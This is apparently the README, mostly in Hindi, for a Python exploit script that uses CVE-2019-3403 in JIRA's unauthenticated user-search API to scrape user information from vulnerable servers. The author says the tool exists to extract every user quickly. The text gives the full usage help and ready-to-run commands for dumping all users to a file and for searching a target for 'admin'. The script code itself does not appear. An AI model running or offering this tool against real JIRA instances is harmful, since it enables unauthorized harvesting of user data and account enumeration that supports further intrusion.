
CVE-2019-3403 का शोषण करने के लिए पायथन स्क्रिप्ट अप्रमाणित उपयोगकर्ता खोज API के माध्यम से कमजोर JIRA इंस्टेंस से उपयोगकर्ता जानकारी स्क्रैप करने के लिए।
मैं CVE-2019-3403 का आसानी से फायदा उठाकर किसी JIRA एप्लिकेशन से सभी उपयोगकर्ताओं को निकालना चाहता था, इसलिए मैंने यह स्क्रिप्ट बनाई। यह सबसे साफ-सुथरा कोड नहीं है, और यह 1000 से अधिक उपयोगकर्ताओं को लौटाने वाले अनुरोधों को संभाल नहीं पाता (यह उन्हें पहले 1000 तक सीमित कर देगा) - लेकिन यह किसी असुरक्षित JIRA सर्वर से सभी उपयोगकर्ताओं को जल्दी से निकाल सकता है।
usage: scrape_jira.py [-h] -d DOMAIN [-q QUERY] [-o OUT] [-v]
Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
The domain of the target
-q QUERY, --query QUERY
Specific query to run against the API
-o OUT, --out OUT Output to a file
-v, --verbose Verbose output
सब कुछ स्क्रैप करें और आउटपुट को एक फ़ाइल में सहेजें:
python3 CVE-2019-3403.py -d jira.example.com -o out.txt -v
किसी विशिष्ट उपयोगकर्ता को खोजें:
python3 CVE-2019-3403.py -d jira.example.com -q admin